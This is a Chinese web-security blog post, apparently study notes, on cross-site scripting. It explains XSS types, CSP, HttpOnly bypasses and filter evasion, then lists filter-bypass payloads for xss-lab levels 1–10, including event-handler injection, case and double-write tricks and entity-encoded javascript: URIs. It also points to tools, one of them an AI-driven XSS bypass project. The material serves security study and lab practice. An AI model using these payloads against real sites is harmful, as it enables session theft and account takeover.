XSS跨站&CSP策略&HttpOnly属性&Filter代码&符号标签&AI绕过&工具项目

Ethan医生7个月前WEB安全217

#XSS跨站-输入输出-原理&分类&利用点

漏洞原理:接受输入数据,输出显示数据后解析执行

基础类型:反射(非持续),存储(持续)DOM-BASE

拓展类型:jquery,mxss,uxss,pdfxss,flashxss,上传xss等

业务类型:localStorage,postMessage,React,Electron,VUE

常用标签:https://www.freebuf.com/articles/web/340080.html

攻击利用:盲打,COOKIE盗取,凭据窃取,页面劫持,网络钓鱼,权限维持等

安全修复:字符过滤,实例化编码,http_only,CSP防护,WAF拦截等

测试流程:看输出想输入在哪里,更改输入代码看执行(标签,过滤决定)

 

#XSS跨站-分类测试-反射&存储&DOM

-数据交互的地方

get、post、headers

反馈与浏览

富文本编辑器

各类标签插入和自定义

-数据输出的地方

用户资料

数据输出

评论,留言等

关键词、标签、说明

文件上传

 

#CSP

内容安全策略是一种可信白名单机制,来限制网站中是否可以包含某来源内容。

该制度明确告诉客户端,哪些外部资源可以加载和执行,等同于提供白名单,

它的实现和执行全部由浏览器完成,开发者只需提供配置。

禁止加载外域代码,防止复杂的攻击逻辑。

禁止外域提交,网站被攻击后,用户的数据不会泄露到外域。

禁止内联脚本执行(规则较严格,目前发现 GitHub 使用)。

禁止未授权的脚本执行(新特性,Google Map 移动版在使用)。

合理使用上报可以及时发现XSS,利于尽快修复问题。

 

实验:

1、设置任何域JS加载

2、设置本地域JS加载

绕过利用条件:文件上传JS绕过

3、设置本地域JS外加限制目录

绕过利用条件:目录有302跳转绕过

4、其他绕过技术

参考:https://xz.aliyun.com/news/11816

 

#http_only

一个可以在设置Cookie时使用的标记;当一个Cookie被标记为HttpOnly时,JavaScript无法访问该Cookie,只能通过HTTP(或HTTPS)协议传输。

这一特性有助于防止跨站脚本攻击(XSS),因为攻击者无法通过JavaScript代码窃取存储在 HttpOnly Cookie中的敏感信息。

实验:

1、开启HttpOnly时XSS窃取Cookie的加载情况

2、未开启HttpOnly时XSS窃取Cookie的加载情况

绕过:有但鸡肋

(1) CVE-2012-0053

(2) PHPINFO页面

(3) Flash/Java

blog.csdn.net/weixin_42478365/article/details/116597222

思路:一般可不采用获取Cookie利用,采用方式(钓鱼,浏览器攻击框架等)

 

#WAF或代码Filter

黑盒XSS手工分析:

-页面中显示的数据找可控的(有些隐藏的)

-利用可控地方发送JS代码去看执行加载情况

-成功执行即XSS,不能成功就看语句输出的地方显示(过滤)

-根据显示分析为什么不能执行(实体化,符号括起来,关键字被删除等)

 

1、人工分析

演示:xss-lab(关卡)

https://xz.aliyun.com/t/4067

https://xz.aliyun.com/news/11816

https://github.com/Re13orn/xss-lab

blog.csdn.net/2301_80031208/article/details/139159525

 

2、工具项目

https://github.com/s0md3v/XSStrike

https://github.com/wxwhhh/Chypass_pro  ---- AI绕过XSS

演示:

https://xss.xiejiahe.com/

 

1、无任何过滤

<script>alert()</script>

 

2、实体化 输入框没有

"> <script>alert()</script> <"

 

3、全部实体化 利用标签事件 单引号闭合

" onfocus=javascript:alert() "

 

4、全部实体化 利用标签事件 双引号闭合

" onfocus=javascript:alert() "

 

5、事件关键字过滤 利用其他标签调用 双引号闭合

"> <a href=javascript:alert()>xxx</a> <"

 

6、利用大小写未正则匹配

"> <sCript>alert()</sCript> <"

 

7、利用双写绕过匹配

"> <a hrehreff=javascript:alert()>x</a> <"

 

8、利用Unicode编码

&#x006a&#x0061&#x0076&#x0061&#x0073&#x0063&#x0072&#x0069&#x0070&#x0074&#x003a&#x0061&#x006c&#x0065&#x0072&#x0074&#x0028&#x0029

 

9、利用Unicode编码(内容检测)

&#x006a&#x0061&#x0076&#x0061&#x0073&#x0063&#x0072&#x0069&#x0070&#x0074&#x003a&#x0061&#x006c&#x0065&#x0072&#x0074&#x0028&#x0029;('http://')

 

10、隐藏属性触发闭合

<script>alert('xss')</script>&t_sort=" type="text" onclick="alert('xss')

 

11-20

https://blog.csdn.net/l2872253606/article/details/125638898


标签: XSSHttpOnly

相关文章

RCE&代码执行&命令执行&无回显方案&语言表达式&黑盒功能点&白盒方法名

-RCE代码执行:引用脚本代码解析执行-RCE命令执行:脚本调用操作系统命令漏洞函数:1.PHP:PHP代码执行函数:eval()、assert()、preg_replace()、create_fun...

JAVA攻防-反序列化利用&JNDI注入&高版本绕过&依赖Jar包&gadge包链&自动Bypass

JAVA攻防-反序列化利用&JNDI注入&高版本绕过&依赖Jar包&gadge包链&自动Bypass

➢ Java攻防-JNDI注入-高版本的绕过Bypass#高版本JNDI绕过技术参考:https://tttang.com/archive/1405/RMI限制:com.sun.jndi.r...

JAVA攻防-Shiro专题&有key无利用链&JRMP协议&CC1&CB1链分析&Transform执行链

#Shrio有key无链:JRMP指的是Java远程方法协议(Java Remote Method Protocol)。它是 Java 对象实现远程通信的基础技术,也是Java RMI(Remote...

XML&XXE&无回显带外&SSRF元数据&DTD实体&OOB盲注&文件拓展&复盘

XML&XXE&无回显带外&SSRF元数据&DTD实体&OOB盲注&文件拓展&复盘

#详细点:XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。等同于JSON...

文件包含&LFI&RFI&伪协议条件&编码算法&无文件利用&JAVA应用&SRC复盘

文件包含&LFI&RFI&伪协议条件&编码算法&无文件利用&JAVA应用&SRC复盘

1、原理程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为文件包含。在包含文件的过程中,如果文件能进行控制,则存储文件包...

JAVA攻防-FastJson专题&面试不出网利用&BCEL字节码&C3P0二次&Impl链&延时判断

JAVA攻防-FastJson专题&面试不出网利用&BCEL字节码&C3P0二次&Impl链&延时判断

➢ Java攻防-FastJson-不出网gadget链分析#FastJson不出网利用:参考:https://xz.aliyun.com/news/11938参考:https://gith...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。